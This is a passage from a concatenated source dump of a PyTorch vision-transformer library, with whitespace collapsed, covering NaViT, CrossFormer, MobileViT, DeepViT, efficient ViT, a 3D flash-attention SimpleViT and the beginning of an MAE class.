to work in certain papers. 
requires l2norm on non-ragged dimension to be supported in nested tensors self.query_norm = nn.LayerNorm(dim_head, bias = False) self.key_norm = nn.LayerNorm(dim_head, bias = False) self.dropout = dropout self.to_out = nn.Linear(dim_inner, dim, bias = False) def forward( self, x, context: Tensor | None = None ): x = self.norm(x) # for attention pooling, one query pooling to entire sequence context = default(context, x) # queries, keys, values query = self.to_queries(x) key = self.to_keys(context) value = self.to_values(context) # split heads def split_heads(t): return t.unflatten(-1, (self.heads, self.dim_head)) def transpose_head_seq(t): return t.transpose(1, 2) query, key, value = map(split_heads, (query, key, value)) # qk norm for attention stability query = self.query_norm(query) key = self.key_norm(key) query, key, value = map(transpose_head_seq, (query, key, value)) # attention out = F.scaled_dot_product_attention( query, key, value, dropout_p = self.dropout if self.training else 0. ) # merge heads out = out.transpose(1, 2).flatten(-2) return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = ModuleList([]) for _ in range(depth): self.layers.append(ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) self.norm = nn.LayerNorm(dim, bias = False) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class NaViT(Module): def __init__( self, *, image_size, max_frames, patch_size, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., num_registers = 4, token_dropout_prob: float | None = None ): super().__init__() image_height, image_width = pair(image_size) # what percent of tokens to dropout # if int or float given, then assume constant dropout prob # otherwise accept a callback that in turn calculates dropout prob from height and width self.token_dropout_prob = token_dropout_prob # calculate patching related stuff assert divisible_by(image_height, patch_size) and divisible_by(image_width, patch_size), 'Image dimensions must be divisible by the patch size.'
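        # layout sketch, using the values from the quick test at the bottom of this file (image_size = 256,
        # max_frames = 8, patch_size = 32, frame_patch_size = 2): a full-size volume is cut into a
        # 4 x 8 x 8 grid of tokens, each a flattened tube of patch_dim = 3 * 32 * 32 * 2 = 6144 values.
        # positions are factorized, so every token later receives pos_embed_frame[f] + pos_embed_height[h]
        # + pos_embed_width[w] rather than an entry from one joint 3d table, which is what lets volumes of
        # different resolutions share the same embedding tables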
assert divisible_by(max_frames, frame_patch_size) patch_frame_dim, patch_height_dim, patch_width_dim = (max_frames // frame_patch_size), (image_height // patch_size), (image_width // patch_size) patch_dim = channels * (patch_size ** 2) * frame_patch_size self.channels = channels self.patch_size = patch_size self.to_patches = Rearrange('c (f pf) (h p1) (w p2) -> f h w (c p1 p2 pf)', p1 = patch_size, p2 = patch_size, pf = frame_patch_size) self.to_patch_embedding = nn.Sequential( nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embed_frame = nn.Parameter(torch.zeros(patch_frame_dim, dim)) self.pos_embed_height = nn.Parameter(torch.zeros(patch_height_dim, dim)) self.pos_embed_width = nn.Parameter(torch.zeros(patch_width_dim, dim)) # register tokens self.register_tokens = nn.Parameter(torch.zeros(num_registers, dim)) nn.init.normal_(self.pos_embed_frame, std = 0.02) nn.init.normal_(self.pos_embed_height, std = 0.02) nn.init.normal_(self.pos_embed_width, std = 0.02) nn.init.normal_(self.register_tokens, std = 0.02) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) # final attention pooling queries self.attn_pool_queries = nn.Parameter(torch.randn(dim)) self.attn_pool = Attention(dim = dim, dim_head = dim_head, heads = heads) # output to logits self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim, bias = False), nn.Linear(dim, num_classes, bias = False) ) @property def device(self): return next(self.parameters()).device def forward( self, volumes: List[Tensor], # different resolution images / CT scans ): batch, device = len(volumes), self.device arange = partial(torch.arange, device = device) assert all([volume.ndim == 4 and volume.shape[0] == self.channels for volume in volumes]), f'all volumes must have {self.channels} channels and number of dimensions of {self.channels} (channels, frame, height, width)' all_patches = [self.to_patches(volume) for volume in volumes] # prepare factorized positional embedding height width indices positions = [] for patches in all_patches: patch_frame, patch_height, patch_width = patches.shape[:3] fhw_indices = torch.stack(torch.meshgrid((arange(patch_frame), arange(patch_height), arange(patch_width)), indexing = 'ij'), dim = -1) fhw_indices = rearrange(fhw_indices, 'f h w c -> (f h w) c') positions.append(fhw_indices) # need the sizes to compute token dropout + positional embedding tokens = [rearrange(patches, 'f h w d -> (f h w) d') for patches in all_patches] # handle token dropout seq_lens = torch.tensor([i.shape[0] for i in tokens], device = device) if self.training and self.token_dropout_prob > 0: keep_seq_lens = ((1. 
- self.token_dropout_prob) * seq_lens).int().clamp(min = 1) kept_tokens = [] kept_positions = [] for one_image_tokens, one_image_positions, seq_len, num_keep in zip(tokens, positions, seq_lens, keep_seq_lens): keep_indices = torch.randn((seq_len,), device = device).topk(num_keep, dim = -1).indices one_image_kept_tokens = one_image_tokens[keep_indices] one_image_kept_positions = one_image_positions[keep_indices] kept_tokens.append(one_image_kept_tokens) kept_positions.append(one_image_kept_positions) tokens, positions, seq_lens = kept_tokens, kept_positions, keep_seq_lens # add all height and width factorized positions frame_indices, height_indices, width_indices = torch.cat(positions).unbind(dim = -1) frame_embed, height_embed, width_embed = self.pos_embed_frame[frame_indices], self.pos_embed_height[height_indices], self.pos_embed_width[width_indices] pos_embed = frame_embed + height_embed + width_embed tokens = torch.cat(tokens) # linear projection to patch embeddings tokens = self.to_patch_embedding(tokens) # absolute positions tokens = tokens + pos_embed # add register tokens tokens = tokens.split(seq_lens.tolist()) tokens = [torch.cat((self.register_tokens, one_tokens)) for one_tokens in tokens] # use nested tensor for transformers and save on padding computation tokens = nested_tensor(tokens, layout = torch.jagged, device = device) # embedding dropout tokens = self.dropout(tokens) # transformer tokens = self.transformer(tokens) # attention pooling # will use a jagged tensor for queries, as SDPA requires all inputs to be jagged, or not attn_pool_queries = [rearrange(self.attn_pool_queries, '... -> 1 ...')] * batch attn_pool_queries = nested_tensor(attn_pool_queries, layout = torch.jagged) pooled = self.attn_pool(attn_pool_queries, tokens) # back to unjagged logits = torch.stack(pooled.unbind()) logits = rearrange(logits, 'b 1 d -> b d') logits = self.to_latent(logits) return self.mlp_head(logits) # quick test if __name__ == '__main__': # works for torch 2.4 v = NaViT( image_size = 256, max_frames = 8, patch_size = 32, frame_patch_size = 2, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0., emb_dropout = 0., token_dropout_prob = 0.1 ) # 5 volumetric data (videos or CT scans) of different resolutions - List[Tensor] volumes = [ torch.randn(3, 2, 256, 256), torch.randn(3, 8, 128, 128), torch.randn(3, 4, 128, 256), torch.randn(3, 2, 256, 128), torch.randn(3, 4, 64, 256) ] assert v(volumes).shape == (5, 1000) File: vit_pytorch/crossformer.py import torch from torch import nn, einsum from einops import rearrange from einops.layers.torch import Rearrange, Reduce import torch.nn.functional as F # helpers def cast_tuple(val, length = 1): return val if isinstance(val, tuple) else ((val,) * length) # cross embed layer class CrossEmbedLayer(nn.Module): def __init__( self, dim_in, dim_out, kernel_sizes, stride = 2 ): super().__init__() kernel_sizes = sorted(kernel_sizes) num_scales = len(kernel_sizes) # calculate the dimension at each scale dim_scales = [int(dim_out / (2 ** i)) for i in range(1, num_scales)] dim_scales = [*dim_scales, dim_out - sum(dim_scales)] self.convs = nn.ModuleList([]) for kernel, dim_scale in zip(kernel_sizes, dim_scales): self.convs.append(nn.Conv2d(dim_in, dim_scale, kernel, stride = stride, padding = (kernel - stride) // 2)) def forward(self, x): fmaps = tuple(map(lambda conv: conv(x), self.convs)) return torch.cat(fmaps, dim = 1) # dynamic positional bias def DynamicPositionBias(dim): return nn.Sequential( nn.Linear(2, dim), 
nn.LayerNorm(dim), nn.ReLU(), nn.Linear(dim, dim), nn.LayerNorm(dim), nn.ReLU(), nn.Linear(dim, dim), nn.LayerNorm(dim), nn.ReLU(), nn.Linear(dim, 1), Rearrange('... () -> ...') ) # transformer classes class LayerNorm(nn.Module): def __init__(self, dim, eps = 1e-5): super().__init__() self.eps = eps self.g = nn.Parameter(torch.ones(1, dim, 1, 1)) self.b = nn.Parameter(torch.zeros(1, dim, 1, 1)) def forward(self, x): var = torch.var(x, dim = 1, unbiased = False, keepdim = True) mean = torch.mean(x, dim = 1, keepdim = True) return (x - mean) / (var + self.eps).sqrt() * self.g + self.b def FeedForward(dim, mult = 4, dropout = 0.): return nn.Sequential( LayerNorm(dim), nn.Conv2d(dim, dim * mult, 1), nn.GELU(), nn.Dropout(dropout), nn.Conv2d(dim * mult, dim, 1) ) class Attention(nn.Module): def __init__( self, dim, attn_type, window_size, dim_head = 32, dropout = 0. ): super().__init__() assert attn_type in {'short', 'long'}, 'attention type must be one of local or distant' heads = dim // dim_head self.heads = heads self.scale = dim_head ** -0.5 inner_dim = dim_head * heads self.attn_type = attn_type self.window_size = window_size self.norm = LayerNorm(dim) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Conv2d(dim, inner_dim * 3, 1, bias = False) self.to_out = nn.Conv2d(inner_dim, dim, 1) # positions self.dpb = DynamicPositionBias(dim // 4) # calculate and store indices for retrieving bias pos = torch.arange(window_size) grid = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) grid = rearrange(grid, 'c i j -> (i j) c') rel_pos = grid[:, None] - grid[None, :] rel_pos += window_size - 1 rel_pos_indices = (rel_pos * torch.tensor([2 * window_size - 1, 1])).sum(dim = -1) self.register_buffer('rel_pos_indices', rel_pos_indices, persistent = False) def forward(self, x): *_, height, width, heads, wsz, device = *x.shape, self.heads, self.window_size, x.device # prenorm x = self.norm(x) # rearrange for short or long distance attention if self.attn_type == 'short': x = rearrange(x, 'b d (h s1) (w s2) -> (b h w) d s1 s2', s1 = wsz, s2 = wsz) elif self.attn_type == 'long': x = rearrange(x, 'b d (l1 h) (l2 w) -> (b h w) d l1 l2', l1 = wsz, l2 = wsz) # queries / keys / values q, k, v = self.to_qkv(x).chunk(3, dim = 1) # split heads q, k, v = map(lambda t: rearrange(t, 'b (h d) x y -> b h (x y) d', h = heads), (q, k, v)) q = q * self.scale sim = einsum('b h i d, b h j d -> b h i j', q, k) # add dynamic positional bias pos = torch.arange(-wsz, wsz + 1, device = device) rel_pos = torch.stack(torch.meshgrid(pos, pos, indexing = 'ij')) rel_pos = rearrange(rel_pos, 'c i j -> (i j) c') biases = self.dpb(rel_pos.float()) rel_pos_bias = biases[self.rel_pos_indices] sim = sim + rel_pos_bias # attend attn = sim.softmax(dim = -1) attn = self.dropout(attn) # merge heads out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h (x y) d -> b (h d) x y', x = wsz, y = wsz) out = self.to_out(out) # rearrange back for long or short distance attention if self.attn_type == 'short': out = rearrange(out, '(b h w) d s1 s2 -> b d (h s1) (w s2)', h = height // wsz, w = width // wsz) elif self.attn_type == 'long': out = rearrange(out, '(b h w) d l1 l2 -> b d (l1 h) (l2 w)', h = height // wsz, w = width // wsz) return out class Transformer(nn.Module): def __init__( self, dim, *, local_window_size, global_window_size, depth = 4, dim_head = 32, attn_dropout = 0., ff_dropout = 0., ): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, 
attn_type = 'short', window_size = local_window_size, dim_head = dim_head, dropout = attn_dropout), FeedForward(dim, dropout = ff_dropout), Attention(dim, attn_type = 'long', window_size = global_window_size, dim_head = dim_head, dropout = attn_dropout), FeedForward(dim, dropout = ff_dropout) ])) def forward(self, x): for short_attn, short_ff, long_attn, long_ff in self.layers: x = short_attn(x) + x x = short_ff(x) + x x = long_attn(x) + x x = long_ff(x) + x return x # classes class CrossFormer(nn.Module): def __init__( self, *, dim = (64, 128, 256, 512), depth = (2, 2, 8, 2), global_window_size = (8, 4, 2, 1), local_window_size = 7, cross_embed_kernel_sizes = ((4, 8, 16, 32), (2, 4), (2, 4), (2, 4)), cross_embed_strides = (4, 2, 2, 2), num_classes = 1000, attn_dropout = 0., ff_dropout = 0., channels = 3 ): super().__init__() dim = cast_tuple(dim, 4) depth = cast_tuple(depth, 4) global_window_size = cast_tuple(global_window_size, 4) local_window_size = cast_tuple(local_window_size, 4) cross_embed_kernel_sizes = cast_tuple(cross_embed_kernel_sizes, 4) cross_embed_strides = cast_tuple(cross_embed_strides, 4) assert len(dim) == 4 assert len(depth) == 4 assert len(global_window_size) == 4 assert len(local_window_size) == 4 assert len(cross_embed_kernel_sizes) == 4 assert len(cross_embed_strides) == 4 # dimensions last_dim = dim[-1] dims = [channels, *dim] dim_in_and_out = tuple(zip(dims[:-1], dims[1:])) # layers self.layers = nn.ModuleList([]) for (dim_in, dim_out), layers, global_wsz, local_wsz, cel_kernel_sizes, cel_stride in zip(dim_in_and_out, depth, global_window_size, local_window_size, cross_embed_kernel_sizes, cross_embed_strides): self.layers.append(nn.ModuleList([ CrossEmbedLayer(dim_in, dim_out, cel_kernel_sizes, stride = cel_stride), Transformer(dim_out, local_window_size = local_wsz, global_window_size = global_wsz, depth = layers, attn_dropout = attn_dropout, ff_dropout = ff_dropout) ])) # final logits self.to_logits = nn.Sequential( Reduce('b c h w -> b c', 'mean'), nn.Linear(last_dim, num_classes) ) def forward(self, x): for cel, transformer in self.layers: x = cel(x) x = transformer(x) return self.to_logits(x) File: vit_pytorch/mobile_vit.py import torch import torch.nn as nn from einops import rearrange from einops.layers.torch import Reduce # helpers def conv_1x1_bn(inp, oup): return nn.Sequential( nn.Conv2d(inp, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), nn.SiLU() ) def conv_nxn_bn(inp, oup, kernel_size=3, stride=1): return nn.Sequential( nn.Conv2d(inp, oup, kernel_size, stride, 1, bias=False), nn.BatchNorm2d(oup), nn.SiLU() ) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout=0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.SiLU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads=8, dim_head=64, dropout=0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim=-1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias=False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim=-1) q, k, v = map(lambda t: rearrange(t, 'b p n (h d) -> b p h n d', h=self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = 
self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b p h n d -> b p n (h d)') return self.to_out(out) class Transformer(nn.Module): """Transformer block described in ViT. Paper: https://arxiv.org/abs/2010.11929 Based on: https://github.com/lucidrains/vit-pytorch """ def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout=0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads, dim_head, dropout), FeedForward(dim, mlp_dim, dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class MV2Block(nn.Module): """MV2 block described in MobileNetV2. Paper: https://arxiv.org/pdf/1801.04381 Based on: https://github.com/tonylins/pytorch-mobilenet-v2 """ def __init__(self, inp, oup, stride=1, expansion=4): super().__init__() self.stride = stride assert stride in [1, 2] hidden_dim = int(inp * expansion) self.use_res_connect = self.stride == 1 and inp == oup if expansion == 1: self.conv = nn.Sequential( # dw nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim), nn.SiLU(), # pw-linear nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), ) else: self.conv = nn.Sequential( # pw nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False), nn.BatchNorm2d(hidden_dim), nn.SiLU(), # dw nn.Conv2d(hidden_dim, hidden_dim, 3, stride, 1, groups=hidden_dim, bias=False), nn.BatchNorm2d(hidden_dim), nn.SiLU(), # pw-linear nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False), nn.BatchNorm2d(oup), ) def forward(self, x): out = self.conv(x) if self.use_res_connect: out = out + x return out class MobileViTBlock(nn.Module): def __init__(self, dim, depth, channel, kernel_size, patch_size, mlp_dim, dropout=0.): super().__init__() self.ph, self.pw = patch_size self.conv1 = conv_nxn_bn(channel, channel, kernel_size) self.conv2 = conv_1x1_bn(channel, dim) self.transformer = Transformer(dim, depth, 4, 8, mlp_dim, dropout) self.conv3 = conv_1x1_bn(dim, channel) self.conv4 = conv_nxn_bn(2 * channel, channel, kernel_size) def forward(self, x): y = x.clone() # Local representations x = self.conv1(x) x = self.conv2(x) # Global representations _, _, h, w = x.shape x = rearrange(x, 'b d (h ph) (w pw) -> b (ph pw) (h w) d', ph=self.ph, pw=self.pw) x = self.transformer(x) x = rearrange(x, 'b (ph pw) (h w) d -> b d (h ph) (w pw)', h=h//self.ph, w=w//self.pw, ph=self.ph, pw=self.pw) # Fusion x = self.conv3(x) x = torch.cat((x, y), 1) x = self.conv4(x) return x class MobileViT(nn.Module): """MobileViT. 
Paper: https://arxiv.org/abs/2110.02178 Based on: https://github.com/chinhsuanwu/mobilevit-pytorch """ def __init__( self, image_size, dims, channels, num_classes, expansion=4, kernel_size=3, patch_size=(2, 2), depths=(2, 4, 3) ): super().__init__() assert len(dims) == 3, 'dims must be a tuple of 3' assert len(depths) == 3, 'depths must be a tuple of 3' ih, iw = image_size ph, pw = patch_size assert ih % ph == 0 and iw % pw == 0 init_dim, *_, last_dim = channels self.conv1 = conv_nxn_bn(3, init_dim, stride=2) self.stem = nn.ModuleList([]) self.stem.append(MV2Block(channels[0], channels[1], 1, expansion)) self.stem.append(MV2Block(channels[1], channels[2], 2, expansion)) self.stem.append(MV2Block(channels[2], channels[3], 1, expansion)) self.stem.append(MV2Block(channels[2], channels[3], 1, expansion)) self.trunk = nn.ModuleList([]) self.trunk.append(nn.ModuleList([ MV2Block(channels[3], channels[4], 2, expansion), MobileViTBlock(dims[0], depths[0], channels[5], kernel_size, patch_size, int(dims[0] * 2)) ])) self.trunk.append(nn.ModuleList([ MV2Block(channels[5], channels[6], 2, expansion), MobileViTBlock(dims[1], depths[1], channels[7], kernel_size, patch_size, int(dims[1] * 4)) ])) self.trunk.append(nn.ModuleList([ MV2Block(channels[7], channels[8], 2, expansion), MobileViTBlock(dims[2], depths[2], channels[9], kernel_size, patch_size, int(dims[2] * 4)) ])) self.to_logits = nn.Sequential( conv_1x1_bn(channels[-2], last_dim), Reduce('b c h w -> b c', 'mean'), nn.Linear(channels[-1], num_classes, bias=False) ) def forward(self, x): x = self.conv1(x) for conv in self.stem: x = conv(x) for conv, attn in self.trunk: x = conv(x) x = attn(x) return self.to_logits(x) File: vit_pytorch/deepvit.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.dropout = nn.Dropout(dropout) self.reattn_weights = nn.Parameter(torch.randn(heads, heads)) self.reattn_norm = nn.Sequential( Rearrange('b h i j -> b i j h'), nn.LayerNorm(heads), Rearrange('b i j h -> b h i j') ) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): b, n, _, h = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) # attention dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = dots.softmax(dim=-1) attn = self.dropout(attn) # re-attention attn = einsum('b h i j, h g -> b g i j', attn, self.reattn_weights) attn = self.reattn_norm(attn) # aggregate and out out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') out = self.to_out(out) return out class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, 
heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class DeepViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/efficient.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange def pair(t): return t if isinstance(t, tuple) else (t, t) class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, transformer, pool = 'cls', channels = 3): super().__init__() image_size_h, image_size_w = pair(image_size) assert image_size_h % patch_size == 0 and image_size_w % patch_size == 0, 'image dimensions must be divisible by the patch size' assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' num_patches = (image_size_h // patch_size) * (image_size_w // patch_size) patch_dim = channels * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.transformer = transformer self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/simple_flash_attn_vit_3d.py from packaging import version from collections import namedtuple import torch from torch import nn import torch.nn.functional as F from torch.nn import Module, ModuleList from einops import rearrange from einops.layers.torch import Rearrange # constants Config = namedtuple('FlashAttentionConfig', ['enable_flash', 'enable_math', 
'enable_mem_efficient']) # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_3d(patches, temperature = 10000, dtype = torch.float32): _, f, h, w, dim, device, dtype = *patches.shape, patches.device, patches.dtype z, y, x = torch.meshgrid( torch.arange(f, device = device), torch.arange(h, device = device), torch.arange(w, device = device), indexing = 'ij') fourier_dim = dim // 6 omega = torch.arange(fourier_dim, device = device) / (fourier_dim - 1) omega = 1. / (temperature ** omega) z = z.flatten()[:, None] * omega[None, :] y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos(), z.sin(), z.cos()), dim = 1) pe = F.pad(pe, (0, dim - (fourier_dim * 6))) # pad if feature dimension not cleanly divisible by 6 return pe.type(dtype) # main class class Attend(Module): def __init__(self, use_flash = False, config: Config = Config(True, True, True)): super().__init__() self.config = config self.use_flash = use_flash assert not (use_flash and version.parse(torch.__version__) < version.parse('2.0.0')), 'in order to use flash attention, you must be using pytorch 2.0 or above' def flash_attn(self, q, k, v): # flash attention - https://arxiv.org/abs/2205.14135 with torch.backends.cuda.sdp_kernel(**self.config._asdict()): out = F.scaled_dot_product_attention(q, k, v) return out def forward(self, q, k, v): n, device, scale = q.shape[-2], q.device, q.shape[-1] ** -0.5 if self.use_flash: return self.flash_attn(q, k, v) # similarity sim = einsum("b h i d, b j d -> b h i j", q, k) * scale # attention attn = sim.softmax(dim=-1) # aggregate values out = einsum("b h i j, b j d -> b h i d", attn, v) return out # classes class FeedForward(Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(Module): def __init__(self, dim, heads = 8, dim_head = 64, use_flash = True): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = Attend(use_flash = use_flash) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) out = self.attend(q, k, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, use_flash): super().__init__() self.layers = ModuleList([]) for _ in range(depth): self.layers.append(ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, use_flash = use_flash), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return x class SimpleViT(Module): def __init__(self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, use_flash_attn = True): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' 
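        # shape sketch (illustrative numbers, not from the source): a 16-frame 128 x 128 clip with
        # image_patch_size = 16 and frame_patch_size = 2 becomes (16 // 2) * (128 // 16) ** 2 = 512 tokens,
        # each a flattened tube of patch_dim = 3 * 16 * 16 * 2 = 1536 values; posemb_sincos_3d above spends
        # dim // 6 sin/cos frequencies per axis (width, height, frame) and zero-pads any remainder, so `dim`
        # does not have to be divisible by 6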
assert frames % frame_patch_size == 0, 'Frames must be divisible by the frame patch size' num_patches = (image_height // patch_height) * (image_width // patch_width) * (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b f h w (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, use_flash_attn) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, video): *_, h, w, dtype = *video.shape, video.dtype x = self.to_patch_embedding(video) pe = posemb_sincos_3d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/mae.py import torch from torch import nn import torch.nn.functional as F from einops import repeat from vit_pytorch.vit import Transformer class MAE(nn.Module): def __init__( self, *, encoder, decoder_dim, masking_ratio = 0.75, decoder_depth = 1, decoder_heads = 8, decoder_dim_head = 64 ): super().__init__() assert masking_ratio > 0 and masking_ratio < 1, 'masking ratio must be kept between 0 and 1' self.masking_ratio = masking_ratio # extract some hyperparameters and functions from encoder (vision transformer to be trained) self.encoder = encoder num_patches, encoder_dim = encoder.pos_embedding.shape[-2:] self.to_patch = encoder.to_patch_embedding[0] self.patch_to_emb = nn.Sequential(*encoder.to_patch_embedding[1:]) pixel_values_per_patch = encoder.to_patch_embedding[2].weight.shape[-1] # decoder parameters self.decoder_dim = decoder_dim self.enc_to_dec = nn.Linear(encoder_dim, decoder_dim) if encoder_dim != decoder_dim else nn.Identity() self.mask_token = nn.Parameter(torch.randn(decoder_dim)) self.decoder = Transformer(dim = decoder_dim, depth = decoder_depth, heads = decoder_heads, dim_head = decoder_dim_head, mlp_dim = decoder_dim * 4) self.decoder_pos_emb = nn.Embedding(num_patches, 